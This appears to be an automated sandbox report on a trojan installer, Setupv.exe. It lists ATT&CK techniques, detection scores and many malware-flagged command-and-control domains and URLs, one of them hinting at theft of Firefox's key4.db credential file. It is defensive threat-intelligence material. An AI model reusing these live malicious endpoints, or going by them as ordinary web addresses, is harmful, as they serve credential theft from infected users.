        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior

        Remote Access Functionality

        Source: Yara match | File source: 00000000.00000003.1851653788.0000000002CE2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: sslproxydump.pcap, type: PCAP
        Source: Yara match | File source: Process Memory Space: Setupv.exe PID: 7840, type: MEMORYSTR
        Tactic | Techniques (a number preceding a technique is the marker shown next to it in the report)
        Reconnaissance | Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
        Resource Development | Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
        Initial Access | Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
        Execution | 12 Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd
        Persistence | 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
        Privilege Escalation | 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
        Defense Evasion | 21 Virtualization/Sandbox Evasion; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 DLL Side-Loading; Software Packing
        Credential Access | 2 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
        Discovery | 221 Security Software Discovery; 21 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 File and Directory Discovery; 22 System Information Discovery
        Lateral Movement | Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
        Collection | 1 Archive Collected Data; 31 Data from Local System; 2 Clipboard Data; Input Capture; Keylogging
        Command and Control | 21 Encrypted Channel; 1 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 114 Application Layer Protocol; Fallback Channels
        Exfiltration | Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
        Impact | Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact
        Source | Detection | Scanner | Label | Link
        Setupv.exe | 28% | ReversingLabs | Win32.Trojan.Generic |
        Setupv.exe | 28% | Virustotal | |
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        Source | Detection | Scanner | Label | Link
        https://cartograhphy.top:443/ixauaD( | 100% | Avira URL Cloud | malware |
        https://cartograhphy.top/ixau3 | 100% | Avira URL Cloud | malware |
        http://store.steampowern: | 0% | Avira URL Cloud | safe |
        https://biosphxere.digital/ | 100% | Avira URL Cloud | malware |
        https://geographys.run/m | 100% | Avira URL Cloud | malware |
        https://biosphxere.digital/tqoa | 100% | Avira URL Cloud | malware |
        https://woodpeckersd.run/glsk | 100% | Avira URL Cloud | malware |
        https://toptalentw.top:443/qenal | 100% | Avira URL Cloud | malware |
        https://topographky.top/l/ | 100% | Avira URL Cloud | malware |
        https://toptalentw.top/qena | 100% | Avira URL Cloud | malware |
        https://biosphxere.digital:443/tqoa | 100% | Avira URL Cloud | malware |
        https://vigorbridgoe.top/banb8 | 100% | Avira URL Cloud | malware |
        https://toptalentw.top:443/qenazchhhv.default-release/key4.dbPK | 100% | Avira URL Cloud | malware |
        https://topographky.top/f.ms1& | 100% | Avira URL Cloud | malware |
        transdataa.digital/xwpa | 100% | Avira URL Cloud | malware |
        https://topographky.top/xlakoam | 100% | Avira URL Cloud | malware |
        https://woodpeckersd.run/ | 100% | Avira URL Cloud | malware |
        https://tropiscbs.live/S | 100% | Avira URL Cloud | malware |
        http://ocsp.sectigo.com0B | 0% | Avira URL Cloud | safe |
        https://transdataa.digital/ | 100% | Avira URL Cloud | malware |
        https://tropiscbs.live/iuwxx | 100% | Avira URL Cloud | malware |


        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        steamcommunity.com | 23.52.218.12 | true | false | | high
        transdataa.digital | 172.67.182.68 | true | true | | unknown
        toptalentw.top | 104.21.36.133 | true | false | | high
        pki-goog.l.google.com | 192.178.49.195 | true | false | | high
        cartograhphy.top | unknown | unknown | true | | unknown
        topographky.top | unknown | unknown | true | | unknown
        woodpeckersd.run | unknown | unknown | true | | unknown
        tropiscbs.live | unknown | unknown | false | | high
        biosphxere.digital | unknown | unknown | true | | unknown
        geographys.run | unknown | unknown | false | | high
        vigorbridgoe.top | unknown | unknown | false | | high
        climatologfy.top | unknown | unknown | false | | high
        Name | Malicious | Antivirus Detection | Reputation
        https://toptalentw.top/qena | false | Avira URL Cloud: malware | unknown
        woodpeckersd.run/glsk | false | | high
        tropiscbs.live/iuwxx | false | | high
        topographky.top/xlak | false | | high
        climatologfy.top/kbud | false | | high
        vigorbridgoe.top/banb | false | | high
        https://steamcommunity.com/profiles/76561199845513035 | false | | high
        transdataa.digital/xwpa | true | Avira URL Cloud: malware | unknown
        geographys.run/eirq | false | | high
        biosphxere.digital/tqoa | false | | high
        Name | Source | Malicious | Antivirus Detection | Reputation
        https://biosphxere.digital/ | Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
        https://cartograhphy.top/ixau3 | Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
        https://player.vimeo.com | Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp | false | | high
        https://toptalentw.top:443/qenal | Setupv.exe, 00000000.00000002.1853132454.0000000000C85000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
        https://cartograhphy.top:443/ixauaD( | Setupv.exe, 00000000.00000003.1719414142.0000000000C82000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
        https://duckduckgo.com/ac/?q= | Setupv.exe, 00000000.00000003.1736580878.0000000003AE0000.00000004.00000800.00020000.00000000.sdmp | false | | high
        http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0# | Setupv.exe | false | | high
        http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | Setupv.exe | false | | high
        https://woodpeckersd.run/glsk | Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
        https://steamcommunity.com/?subsection=broadcasts | Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp | false | | high
        https://biosphxere.digital/tqoa | Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
        http://store.steampowern: | Setupv.exe, 00000000.00000003.1786932542.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=iOnz | Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719414142.0000000000C79000.00000004.00000020.00020000.00000000.sdmp | false | | high
        https://topographky.top/l/ | Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
        http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | Setupv.exe | false | | high
        https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743. | Setupv.exe, 00000000.00000003.1766530993.0000000003AE8000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://geographys.run/m | Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
        https://vigorbridgoe.top/banb | Setupv.exe, 00000000.00000002.1852863691.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp | false | | high
        https://store.steampowered.com/subscriber_agreement/ | Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://www.gstatic.cn/recaptcha/ | Setupv.exe, 00000000.00000003.1719414142.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1853289958.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1816496507.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1818208188.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1810483565.0000000000D02000.00000004.00000020.00020000.00000000.sdmp | false | | high
        https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=SYITZEvy19LV&amp;l=en | Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | false | | high
        http://www.valvesoftware.com/legal.htm | Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&a | Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp | false | | high
        https://www.youtube.com | Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp | false | | high
        https://www.google.com | Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp | false | | high
        https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=OftCDPJyLyB9&amp;l=english&am | Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S | Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp | false | |
                                                                                    high
                                                                                    https://biosphxere.digital:443/tqoaSetupv.exe, 00000000.00000003.1719414142.0000000000C82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    unknown
                                                                                    https://vigorbridgoe.top/banb8Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    unknown
                                                                                    https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&amp;l=englSetupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://toptalentw.top:443/qenazchhhv.default-release/key4.dbPKSetupv.exe, 00000000.00000003.1845958800.0000000000C85000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1811025242.0000000000C85000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1853132454.0000000000C85000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackSetupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://duckduckgo.com/chrome_newtabv209hSetupv.exe, 00000000.00000003.1736580878.0000000003AE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://tropiscbs.live/SSetupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          unknown
                                                                                          https://s.ytimg.com;Setupv.exe, 00000000.00000003.1719414142.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1853289958.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDSetupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://steam.tv/Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://steamcommunity.com/profiles/76561199845513035/badgesSetupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719414142.0000000000C79000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#Setupv.exefalse
                                                                                                    high
                                                                                                    https://steamcommunity.com:443/profiles/76561199845513035Setupv.exe, 00000000.00000003.1719414142.0000000000C82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateAccept-EncodSetupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=sd6kCnGQW5Ji&amp;Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=6Gx3WA4gUqNSetupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://store.steampowered.com/privacy_agreement/Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://store.steampowered.com/points/shop/Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Setupv.exe, 00000000.00000003.1736580878.0000000003AE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0Setupv.exe, 00000000.00000003.1764855874.0000000003B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://ocsp.rootca1.amazontrust.com0:Setupv.exe, 00000000.00000003.1764855874.0000000003B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://sketchfab.comSetupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://lv.queniujq.cnSetupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSetupv.exe, 00000000.00000003.1765988082.0000000003F5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://www.youtube.com/Setupv.exe, 00000000.00000003.1719414142.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1853289958.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1816496507.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1818208188.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1810483565.0000000000D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://store.steampowered.com/privacy_agreement/Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://topographky.top/f.ms1&Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                unknown
                                                                                                                                https://topographky.top/xlakoamSetupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                unknown
                                                                                                                                https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=EZbG2DEumYDH&amp;l=engliSetupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/Setupv.exe, 00000000.00000003.1719414142.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1853289958.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1816496507.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1818208188.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1810483565.0000000000D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=engliSetupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngSetupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://climatologfy.top/kbudSetupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://s.ytimg.comSetupv.exe, 00000000.00000003.1719414142.0000000000CFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://woodpeckersd.run/Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                            unknown
                                                                                                                                            https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zSetupv.exefalse
                                                                                                                                                high
                                                                                                                                                https://www.google.com/recaptcha/Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1818208188.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1810483565.0000000000D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://checkout.steampowered.com/Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refSetupv.exe, 00000000.00000003.1766530993.0000000003AE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://steamcommunity.com/profiles/76561199845513035/inventory/Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28bSetupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719414142.0000000000C79000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477Setupv.exe, 00000000.00000003.1766530993.0000000003AE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://transdataa.digital/Setupv.exe, 00000000.00000002.1852863691.0000000000C2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                            unknown
                                                                                                                                                            https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&ampSetupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.pngSetupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://gemini.google.com/app?q=Setupv.exe, 00000000.00000003.1736580878.0000000003AE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://store.steampowered.com/;Setupv.exe, 00000000.00000003.1719414142.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1853289958.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://ocsp.sectigo.com0BSetupv.exefalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://store.steampowered.com/about/Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://community.cloudflare.steamstatic.com/Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1818208188.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1810483565.0000000000D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://steamcommunity.com/my/wishlist/Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&amp;l=Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
URL | Source | Malicious | Antivirus Detection | Reputation
http://ocsp.sectigo.com0 | Setupv.exe | false | | high
https://steamloopback.host | Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://tropiscbs.live/iuwxx | Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=INiZALwvDIbb | Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://help.steampowered.com/en/ | Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://steamcommunity.com/market/ | Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://store.steampowered.com/news/ | Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi | Setupv.exe, 00000000.00000003.1766530993.0000000003AE8000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=Nvd4msBzMPzu&amp | Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | Setupv.exe, 00000000.00000003.1736580878.0000000003AE0000.00000004.00000800.00020000.00000000.sdmp | false | | high
Map legend: No. of IPs < 25%; 25% to 50%; 50% to 75%; > 75%

IP | Domain | Country | ASN | ASN Name | Malicious
172.67.182.68 | transdataa.digital | United States | 13335 | CLOUDFLARENETUS | true
104.21.36.133 | toptalentw.top | United States | 13335 | CLOUDFLARENETUS | false
